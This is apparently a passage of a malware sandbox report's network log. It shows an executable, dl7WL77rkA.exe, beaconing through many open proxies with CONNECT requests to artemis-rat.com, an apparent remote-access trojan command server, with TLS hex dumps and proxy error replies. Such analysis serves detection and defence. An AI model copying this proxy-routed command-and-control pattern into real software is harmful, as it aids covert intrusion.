                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124809980 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 19 6a 0c b6 94 69 e4 9a ef fe e3 c5 bd 5f dd 18 5a e5 89 c6 18 31 a7 e0 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9ji_Z1DOWNGRD0000*H010Uartemis-rat.com0240311015330Z260311015330Z010Uartemis-rat.com0"0*H05.wN
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.136291027 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 22 65 03 8f 1b f0 45 89 77 90 9f ec 51 73 c2 7e 9d 8e 37 97 0b 44 93 02 82 91 5c 6f d1 03 ce 37 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 9d 8f ad bf a7 48 d6 69 c1 dd c7 25 c6 8f 7d d8 c4 8e cc 82 42
                                                                                                                                                                                                                                                            Data Ascii: %! "eEwQs~7D\o7(Hi%}B2Yj"
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.518973112 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 97 ac d2 bc ba 2f 1f ed c5 ac 98 5c 22 97 15 c0 a4 76 3c 11 1b 6d d1 84 fe 06 bf 68 3e 99 7d 78 a6 de 7b 26 43 30 cb 77
                                                                                                                                                                                                                                                            Data Ascii: (/\"v<mh>}x{&C0w


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1626192.168.2.55452572.37.217.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.354887962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1627192.168.2.554440167.172.86.46104713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.417891026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1628192.168.2.554509194.4.50.60123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.418281078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1629192.168.2.55450723.19.244.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.418788910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1630192.168.2.554529104.21.31.189803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.419156075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.578984022 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1631192.168.2.554443216.9.224.113803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.421176910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.772892952 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1632192.168.2.55444679.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.422153950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1633192.168.2.554412109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.422707081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1634192.168.2.554537185.238.228.67803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.422981024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.579257011 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1635192.168.2.554457185.49.30.580813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.423387051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1636192.168.2.554545104.18.20.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.432657003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.587548971 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1637192.168.2.554541162.247.243.29803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.432809114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.594156981 CET159INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 15
                                                                                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            x-served-by: cache-lax-kwhp1940079
                                                                                                                                                                                                                                                            Data Raw: 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74
                                                                                                                                                                                                                                                            Data Ascii: invalid request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1638192.168.2.55033392.205.61.38360733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.433265924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.486999989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599596024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.608310938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1639192.168.2.55029293.157.248.108883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.449987888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1640192.168.2.553044189.39.118.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.449987888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1641192.168.2.550378104.236.0.129221673876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.461234093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1642192.168.2.55300745.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.463190079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202016115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1643192.168.2.55452218.169.83.8710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.465862036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.113110065 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1644192.168.2.554293202.40.181.220312473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.468950033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405175924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905529976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889580011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1645192.168.2.55306051.161.33.206293603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.469167948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.486990929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599594116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.608639002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1646192.168.2.55425658.84.32.11856783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.470191956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1647192.168.2.554597172.64.86.217803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.470634937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.625262976 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
